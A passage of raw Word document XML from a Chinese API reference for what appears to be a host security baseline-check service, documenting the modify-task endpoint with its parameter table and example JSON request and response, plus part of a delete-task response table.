      <w:tr w:rsidR="00BC669E" w14:paraId="0C65A84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0B509A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C3F02B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6857D3CF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="23853A7F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32F5A434" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>specId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14A934C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A59D676" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>specId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4921D481" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E245CF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>specId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xxxx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" //任务</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>specId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509CF415" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304CBA53" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>status":"success</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",//删除结果</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">         "id": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xxxx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" //任务</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>specId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A94BCD3"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788"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1279"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="31C1219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71CA6C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7135BAC9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="354BA336" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="55A00345" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59316E13" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5858A3CC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B909B3B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>删除结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2CF5388E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76AA49ED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DE2FD75" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08227528" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>specId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="56875BD4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="351" w:name="_Toc115166248"/>
      <w:bookmarkStart w:id="352" w:name="修改任务请求"/>
      <w:bookmarkEnd w:id="350"/>
      <w:r>
        <w:t>修改任务请求</w:t>
      </w:r>
      <w:bookmarkEnd w:id="351"/>
    </w:p>
    <w:p w14:paraId="21DAAF5B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D85F9A4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>PUT /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/baseline/job/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C702A2"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423"/>
        <w:gridCol w:w="1220"/>
        <w:gridCol w:w="4777"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="1BD5F5E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8BCFCEF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75402EDE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A52F6E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="36AAFD78" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A464792" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7534AAE4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="008CDA9A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务名，必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5DC71B24" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58CAAEEC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>specId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72A5803A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="523531DF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>specId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>，必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1630E96F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A6919D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cronEnabled</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D10CD7A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>布尔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38A7BE00" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>必填，是否定时任务 true-定时任务 false-普通任务</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="47191D54" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D77FC39" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F13F9B0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C5EACD4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cronEnabled</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=true必填，</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>任务表达式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="713D1BAA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2986F0F7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38D6F837" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29FD3092" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="40E07960" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="505B45AA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>kind</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="588C5CCE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BD120B5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>必填，范围类型：0-主机；1-业务组；2-全部</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1256FB12" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E9D257F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DB4803B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40A84474" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>kind=0时必填，所选主机列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6DB8BA3A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DEAAEB7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F3D7FC5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="155B6184" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>kind=1时必填，所选业务组列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="16B8274B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62CD2287" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ruleId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72B27EC4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44B60A5B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>必填，基线规则id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31C820BE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659CF136" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>specId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" : "5a71940b7d761b15dbce17ef",//必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "name": "test_001",  //必填，任务名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "kind": 1,  //必填，范围类型 0-主机 1-业务组 2-全部</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "values": ["407c1dd87b1d7771"],  //kind=0时必填，所选主机列表</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "groups": [1, 3, 446],  //kind=1时必填，所选业务组列表</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ruleId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "1b8094cf2cacf0e42acf",  //必填，基线规则id</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cronEnabled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": false,  //必填，是否定时任务 true-定时任务 false-普通任务</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "0 17 * * *",  //</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cronEnabled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=true必填，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>任务表达式</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "description": "xxx"  //任务描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DE9CCD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07324BCD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>status":"success</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",//任务修改状态</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "id": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xxxx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" //任务</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>specId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F92BD75"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788"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1279"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="7EE9703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B7AFE02" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="286F57AA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5282CC6E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="64E87133" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C8339DC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="314F9034" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="545BE837" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>删除结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
